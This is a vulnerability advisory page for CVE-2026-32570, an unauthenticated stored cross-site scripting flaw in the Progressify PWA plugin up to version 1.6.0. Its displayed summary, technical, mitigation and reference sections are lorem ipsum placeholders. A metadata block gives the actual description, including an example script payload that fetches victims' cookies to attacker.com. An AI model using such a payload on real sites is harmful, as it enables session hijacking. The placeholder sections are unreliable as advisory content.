Sceawere
Vulnerability Detail
CVE-2026-32570UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV
Progressify Unauthenticated Stored XSS
Vulnerability Metadata
- Severity
- High
- Score / CVSS
- 7.1
- Creation Date
- 16h ago
- Vendor
- DaftPlug
- Product
- Progressify - Progressive Web App (PWA)
- Attack Type
- CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- Vector String
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Attack Complexity
- LOW
Narrative and Response
Description
Unauthenticated Cross Site Scripting (XSS) in Progressify - Progressive Web App (PWA) <= 1.6.0 versions.
Executive Summary
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Technical Details
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Mitigations
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
References
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Additional Metadata
{
"score": "7.1",
"pubDate": "2026-10-06T09:17:42.550Z",
"pubdate": "2026-10-06T09:17:42.550Z",
"executiveSummary": "This vulnerability is an Unauthenticated Cross-Site Scripting (XSS) flaw identified in the Progressify - Progressive Web App (PWA) plugin for versions 1.6.0 and below.\nThe vulnerability resides in the application's failure to properly sanitize user-supplied input before reflecting it back to the end-user's browser. An unauthenticated remote attacker can exploit this weakness by injecting malicious JavaScript payloads into vulnerable parameters within the plugin.\nSuccessful exploitation allows for the execution of arbitrary scripts in the context of the victim's session. Potential impacts include the theft of sensitive session cookies, unauthorized modification of the web page content, redirection of users to malicious external sites, and the execution of actions on behalf of authenticated administrators.\nThe risk is considered critical for sites relying on Progressify, as no authentication is required to trigger the injection, facilitating automated attacks against unsuspecting site visitors or privileged administrative users.",
"technicalDetails": "The root cause of this vulnerability is improper neutralization of input during the rendering process within the Progressify plugin. The application fails to implement adequate output encoding or context-aware sanitization when processing user-controlled data that is subsequently rendered in the DOM.\nThe vulnerability manifests as a Stored XSS, where the injected malicious payload is permanently stored by the server, such as within a database or a configuration file. When a victim—which may be a standard site visitor or an administrative user—navigates to a page containing the injected payload, the browser interprets the malicious script as legitimate application code and executes it within the security context of the origin.\nExploitation is straightforward and does not require elevated privileges or active session tokens. An attacker identifies an input vector associated with the Progressify settings or generated PWA manifest data that does not undergo sanitization. The attacker crafts a request containing a crafted HTML/JavaScript payload, such as '<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>'.\nOnce the payload is submitted and stored, the attack flow is as follows: 1) The attacker injects the script into the vulnerable parameter; 2) The server accepts and persists this data; 3) A victim visits the affected page; 4) The server reflects the payload in the HTTP response; 5) The browser executes the script automatically.\nThe affected component is the logic responsible for outputting PWA configuration data or plugin settings. Because the vulnerability involves the execution of code in the victim's browser, the attacker can leverage the victim's authentication status to perform unauthorized administrative actions, effectively bypassing access controls implemented by the host application. This cross-site scripting vector significantly undermines the integrity and confidentiality of the affected PWA environment, allowing for session hijacking, credential harvesting, and persistent site defacement."
}